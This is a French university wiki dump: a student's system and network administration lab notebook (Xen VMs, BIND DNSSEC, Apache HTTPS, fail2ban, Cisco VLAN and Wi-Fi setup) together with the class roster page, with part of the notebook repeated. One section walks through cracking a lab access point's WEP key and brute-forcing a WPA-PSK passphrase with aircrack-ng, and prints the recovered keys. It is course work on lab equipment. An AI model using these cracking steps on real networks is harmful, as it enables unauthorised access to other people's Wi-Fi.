mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :
[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Vlan ==

Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png

2026-02-23T10:08:47Z

Abiernac :

DNSviz

SE4 IdO sécurité système/réseau 2025/2026

2026-02-18T08:54:36Z

Abiernac : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|Styx
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E13-Billel
|23
|-
|E14-Antonin
|24
|-
|E15-MSalhi
|25
|-
|E11-Evora
|28
|-
|E12-Gauthier
|21
|-
|E8-Yassine
|18
|-
|E7-Ibrahim
|17
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCedric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolBillel
|<code>10.60.13.0/24</code>
|2001:660:4401:60ad::/64
|-
|PoolAurele
|<code>10.60.9.0/24</code>
|2001:660:4401:60a9::/64
|-
|PoolTom
|<code>10.60.10.0/24</code>
|2001:660:4401:60aa::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|-
|PoolAntonin
|<code>10.60.14.0/24</code>
|2001:660:4401:60ae::/64
|-
|PoolYassine
|10.60.8.0/24
|2001:660:4401:60a8::/64
|-
|PoolEvora
|10.60.11.0/24
|2001:660:4401:60ab::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E14

2026-02-15T11:33:42Z

Abiernac : /* Vlan */

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>
== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
